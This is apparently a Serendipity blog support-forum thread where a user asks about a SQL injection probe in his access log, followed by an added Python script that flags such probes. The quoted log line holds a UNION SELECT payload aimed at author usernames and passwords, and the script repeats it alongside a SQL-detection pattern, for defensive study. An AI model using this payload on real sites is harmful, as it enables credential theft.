Hi -
My 7.0b3 s9y installation received this naughty probe overnight.
Was it in reference to a known sql injection bug?
c-24-14-201-184.client.comcast.net [24.14.201.184] - - [13/Oct/2004:00:42:34 -0400] "GET /~fche/blog/comment.php?serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3%20from%20serendipity_authors%20where%20authorid=1%20/* HTTP/1.1" 200 260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Security bug probe received
garvinhicking
- Core Developer
Re: Security bug probe received
Hi!
Yes, I guess so. But as you can see, when calling the URL, all versions since 0.7-beta2 are not vulnerable...
Regards,
Garvin.
# Garvin Hicking (s9y Developer)
# Did I help you? Consider making me happy: http://wishes.garv.in/
# or use my PayPal account "paypal {at} supergarv (dot) de"
# My "other" hobby: http://flickr.garv.in/
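A log check for the kind of probe quoted in the first post, as an added example that is not part of the original thread or of Serendipity's own code. It assumes `serendipity[entry_id]` should only ever carry an integer; the function name `inspect` and the benign comparison line are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Access log entry quoted in the first post of this thread.
PROBE = ('c-24-14-201-184.client.comcast.net [24.14.201.184] - - '
         '[13/Oct/2004:00:42:34 -0400] "GET /~fche/blog/comment.php?'
         'serendipity[type]=trackbacks&serendipity[entry_id]=0%20and%200'
         '%20union%20select%201,2,3,4,username,password,7,8,9,0,1,2,3'
         '%20from%20serendipity_authors%20where%20authorid=1%20/* HTTP/1.1" '
         '200 260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"')
# Constructed benign entry for comparison (not from the thread).
BENIGN = ('host.example [192.0.2.10] - - [13/Oct/2004:09:00:00 -0400] '
          '"GET /~fche/blog/comment.php?serendipity[type]=trackbacks'
          '&serendipity[entry_id]=42 HTTP/1.1" 200 512 "-" "Mozilla/4.0"')

# Assumption: this parameter should only ever carry an integer entry ID.
NUMERIC_PARAMS = {'serendipity[entry_id]'}
REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/[\d.]+" (\d{3})')
SQL_RE = re.compile(r'\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|/\*|--', re.I)

def inspect(log_line):
    """Return (status, findings) for one access log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None, []
    _method, target, status = m.groups()
    findings = []
    # parse_qsl percent-decodes values, so %20union%20select becomes visible.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not (value.isascii() and value.isdigit()):
            findings.append((name, 'non-integer value'))
        if SQL_RE.search(value):
            findings.append((name, 'SQL syntax in value'))
    return int(status), findings

if __name__ == '__main__':
    for line in (PROBE, BENIGN):
        print(inspect(line))
```

The 200 status in the quoted entry only shows that the page was served; it says nothing about whether the injected query ran.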